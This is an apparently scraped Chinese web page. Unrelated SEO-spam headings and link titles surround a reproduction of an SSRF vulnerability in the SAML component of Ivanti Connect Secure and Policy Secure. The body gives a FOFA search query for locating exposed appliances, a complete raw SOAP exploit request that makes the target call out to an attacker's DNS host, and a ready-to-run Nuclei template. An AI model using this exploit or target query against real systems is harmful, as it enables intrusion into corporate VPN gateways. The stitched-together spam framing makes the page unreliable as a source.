当前位置: 首页 > news >正文

科技公司网站网页企业管理系统开源

科技公司网站网页,企业管理系统开源,推客平台,网站编辑工具免责声明#xff1a;文章来源互联网收集整理#xff0c;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;所产生的一切不良后果与文章作者无关。该…免责声明文章来源互联网收集整理请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 Ⅰ、漏洞描述 Ivanti Connect Secure 为远程和移动用户提供了一个无缝的、具有成本效益的 SSL VPN 解决方案使他们能随时随地从任何可上网的设备访问企业资源。 Ivanti Connect Secure9.x22.x和Ivanti Policy Secure9.x,22.x以及Ivanti Neurons for ZTA的SAML组件中存在SSRF漏洞。 Ⅱ、fofa语句 bodywelcome.cgi?plogo Ⅲ、漏洞复现 POC POST /dana-ws/saml20.ws HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Connection: close Content-Length: 831 Accept-Encoding: gzip?xml version1.0 encodingUTF-8?soap:Envelope xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ soap:Body ds:Signature xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:SignedInfo ds:CanonicalizationMethod Algorithmhttp://www.w3.org/2001/10/xml-exc-c14n#/ ds:SignatureMethod Algorithmhttp://www.w3.org/2000/09/xmldsig#rsa-sha1/ /ds:SignedInfo ds:SignatureValueqwerty/ds:SignatureValue ds:KeyInfo xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.w3.org/2000/09/xmldsig xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:RetrievalMethod URIhttp://your-dns/ ds:X509Data/ /ds:KeyInfo ds:Object/ds:Object /ds:Signature /soap:Body/soap:Envelope 1、构建poc 2、查看DNSlog记录 Ⅳ、Nuclei-POC id: Ivanti-Pulse-Connect-Secure-VPN-SSRFinfo:name: Ivanti Connect Secure9.x22.x和Ivanti Policy Secure9.x,22.x以及Ivanti Neurons for ZTA的SAML组件中存在SSRF漏洞。author: WLFseverity: highmetadata: fofa-query: bodywelcome.cgi?plogo variables:filename: {{to_lower(rand_base(10))}}boundary: {{to_lower(rand_base(20))}} http:- raw:- |POST /dana-ws/saml20.ws HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Connection: closeContent-Length: 831Accept-Encoding: gzip?xml version1.0 encodingUTF-8?soap:Envelope xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ soap:Body ds:Signature xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:SignedInfo ds:CanonicalizationMethod Algorithmhttp://www.w3.org/2001/10/xml-exc-c14n#/ ds:SignatureMethod Algorithmhttp://www.w3.org/2000/09/xmldsig#rsa-sha1/ /ds:SignedInfo ds:SignatureValueqwerty/ds:SignatureValue ds:KeyInfo xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xsi:schemaLocationhttp://www.w3.org/2000/09/xmldsig xmlns:dshttp://www.w3.org/2000/09/xmldsig# ds:RetrievalMethod URIhttp://{{interactsh-url}}/ ds:X509Data/ /ds:KeyInfo ds:Object/ds:Object /ds:Signature /soap:Body/soap:Envelopematchers:- type: dsldsl:- contains(interactsh_protocol, dns)condition: and Ⅴ、修复建议 升级至安全版本
http://www.zqtcl.cn/news/227575/

相关文章:

  • 网站模板上传工具如何介绍自己设计的网页
  • 河北网站建设价格低国内做外单的网站有哪些
  • wordpress Apache升级优化营商环境的意义
  • 单页式网站系统wordpress自定义字段怎么用
  • 南宁网站设计要多少钱修改wordpress中的 功能 小工具
  • 南昌高端网站开发费用表域名价格排行
  • 怎么接网站开发外包中国观鸟记录的网站架构
  • 青海省住房和城乡建设厅的官方网站网站举报能不能查到举报人
  • dw做的网站如何上传云服务器网址生成app一键生成器
  • 山西建设厅网站密钥房山营销型网站建设
  • 网站空间多少钱哪里接单做网站
  • 建设部网站资质人员查询页面设计的对称方法包括哪几种形式
  • 滁州网站建设哪个好点iis发布网站无法访问
  • 网站项目建设的定义百度站长平台清退
  • ip开源网站FPGA可以做点什么建设网站的工作职责
  • 重庆微信网站开发公司建设网站技术标准
  • 网站开发浏览器银川市建设诚信平台网站
  • 找合伙人做红木家具网站建设银行员工学习网站
  • iis的默认网站没有自动启动长春小程序开发制作
  • 佛山住房和城乡建设部网站wordpress 英文主题
  • 零食网站策划书厦门建设网站的公司
  • 自己做的网站怎么发布到网上湖南做网站 干净磐石网络
  • steam网站代做设计公司招聘信息
  • 网站开发 书籍无广告自助建站
  • 青岛电子商务网站建设wordpress购物车会员
  • 大理建网站沉默是金吉他谱
  • 门户网站需要多少费用wordpress的中文插件安装
  • 男做基视频网站怎么做网上直营店网站
  • 网站栏目排序个人站长网站应该如何定位
  • phpcms wap网站搭建学网站开发难吗